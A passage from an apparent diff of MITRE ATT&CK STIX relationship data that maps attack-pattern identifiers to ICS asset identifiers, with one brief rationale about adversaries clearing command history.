"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--79407d1e-8e16-48c1-939c-ad92f91dd988", + "created": "2023-09-29T16:30:19.141Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:30:19.141Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7971a8b3-6935-43f0-a9d9-e6face619150", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--798a0c48-8e10-42c8-8c3f-448dad90174e", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--798de2f3-218b-4622-a62c-84e3840d45a6", + "created": "2023-09-29T18:00:10.845Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:00:10.845Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7997cfcb-2e43-447c-a69c-b60e3cf00397", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43f2776f-b4bd-4118-94b8-fee47e69676d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--799eccf9-478d-421e-8f14-074b5546cb6a", + "created": "2020-01-24T14:52:25.778Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd", + "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--79b56736-73b9-423f-8d2e-725081e3994e", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--79c6d710-baf4-411e-a3f5-9cb8d42b7c19", + "created": "2023-09-29T16:32:22.510Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:32:22.510Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--79cf4e4a-aa04-4414-85a8-17cc6f0cad18", + "created": "2020-03-20T16:01:21.024Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--9b52fca7-1a36-4da0-b62d-da5bd83b4d69", + "target_ref": "attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7a1482c2-e11d-4143-a077-c425406cdc28", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7a1812b0-ed8e-4d01-be16-b373bee5d1e8", + "created": "2024-06-21T14:12:20.275Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.275Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c9e0c59e-162e-40a4-b8b1-78fab4329ada", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7a35d985-17ae-429a-b828-08d34e92002f", + "created": "2020-01-31T18:59:01.162Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--d21a2069-23d5-4043-ad6d-64f6b644cb1a", + "target_ref": "attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7a3b66f5-3822-49fd-9c94-866b499c33bf", + "created": "2024-06-21T14:12:20.267Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.267Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7a484894-81e3-4bd7-852e-4e266d74a783", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7a6ba664-1bc7-4f4a-8334-9b39ad77a83e", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7a784811-d844-4585-8044-c8661a037241", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7a7b7194-87e4-4c1f-94f9-fab6d4036a67", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7a86dc76-69ca-41eb-9931-5acd33a40535", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7a9e5024-7652-47f8-800d-a72d1ccbd70c", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--83a766f8-1501-4b3a-a2de-2e2849e8dfc1", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7aaa683d-9f91-4c9d-a391-9c7bdedb748a", + "created": "2024-05-22T17:16:30.315Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T02:44:53.041Z", + "description": "Asset Mapping Rationale: In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Adversaries may also leverage a Network Device CLI on network devices to clear command history data.", + "relationship_type": "targets", + "source_ref": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7aaab0ef-69b8-4b34-98bc-8a83ff654884", + "created": "2020-02-21T20:57:38.303Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--086952c4-5b90-4185-b573-02bad8e11953", + "target_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7ab48910-1952-4774-8f77-4b522272bdad", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7ab97009-e8f7-4829-9926-4558ea10cf0d", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7ac26b6d-86ae-4aad-9047-3ce6ba57089f", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7acc72e1-250d-4494-87fb-998bd1fd3de7", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7af1a6bd-99d0-480e-99f5-ba67b81d5096", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7b1e00af-11fb-4862-a193-55dc9b6652c0", + "created": "2023-09-29T16:33:23.456Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:33:23.456Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7b2c36f6-8b67-458c-81ae-f955e2e9bddc", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7b31221a-da55-4e32-a34d-66376fc4626b", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7b39173a-092f-4e79-ad19-3af1c780c06c", + "created": "2020-03-16T15:31:05.883Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7b3b0201-0d16-499a-a08f-3540b0206fd0", + "created": "2024-06-26T14:31:37.493Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:31:37.493Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7b473e00-2e4a-4891-95e4-07b5a4281945", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7b47536c-5618-49b8-bd7e-0d21a73c1239", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7b814e39-71fc-4e99-b46f-b24eca6cc780", + "created": "2023-09-28T19:45:42.727Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:45:42.727Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7b95b2aa-9561-494f-8e02-d36edc14e38b", + "created": "2023-09-29T17:39:54.089Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:39:54.089Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7ba07dbd-0527-4db1-a2a3-0820c955c11b", + "created": "2024-06-27T09:31:51.428Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:31:51.428Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7bb1dbec-7314-479a-9496-86f8e25041eb", + "created": "2023-09-29T16:40:43.415Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:40:43.416Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7bb3a0a1-65d8-4bda-8eeb-c36bee0f475e", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": 